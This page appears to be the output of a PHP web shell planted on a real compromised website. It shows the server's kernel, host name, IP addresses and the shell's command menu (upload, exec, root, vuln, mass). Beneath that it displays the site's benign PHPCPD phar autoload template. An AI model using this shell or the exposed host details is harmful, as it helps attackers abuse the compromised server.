Kernel : Linux vmw02p.internet-indee.net 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Tue Nov 16 14:42:35 UTC 2021 x86_64
Disable function : NONE
Safe mode : OFF
Host : firofichi.it | Server ip : 5.196.164.15 | Your ip : 18.222.117.15 | Time @ Server : 19 Oct 2024 07:15:59
MySQL : OFF | MSSQL : OFF | cURL : ON | Oracle : OFF | wget : ON | Perl : ON

/home/webmaster/firofichi/www/vendor/sebastian/phpcpd/build/

HOME about upload exec mass file domain root vuln newfile newfolder kill me

File Path : /home/webmaster/firofichi/www/vendor/sebastian/phpcpd/build/phar-autoload.php.in

#!/usr/bin/env php <?php if (version_compare('5.6.0', PHP_VERSION, '>')) { fwrite( STDERR, sprintf( 'This version of PHPCPD is supported on PHP 5.6, PHP 7.0, and PHP 7.1.' . PHP_EOL . 'You are using PHP %s%s.' . PHP_EOL, PHP_VERSION, defined('PHP_BINARY') ? ' (' . PHP_BINARY . ')' : '' ) ); die(1); } if ($_SERVER['SCRIPT_NAME'] != '-') { $phar = realpath($_SERVER['SCRIPT_NAME']); } else { $files = get_included_files(); $phar = $files[0]; } define('__PHPCPD_PHAR__', str_replace(DIRECTORY_SEPARATOR, '/', $phar)); define('__PHPCPD_PHAR_ROOT__', 'phar://___PHAR___'); spl_autoload_register( function ($class) { static $classes = NULL; if ($classes === NULL) { $classes = array( ___CLASSLIST___ ); } $class = strtolower($class); if (isset($classes[$class])) { require 'phar://___PHAR___' . $classes[$class]; } } ); Phar::mapPhar('___PHAR___'); if (isset($_SERVER['argv'][1]) && $_SERVER['argv'][1] == '--manifest') { print file_get_contents(__PHPCPD_PHAR_ROOT__ . '/manifest.txt'); exit; } $application = new SebastianBergmann\PHPCPD\CLI\Application; $application->run(); __HALT_COMPILER();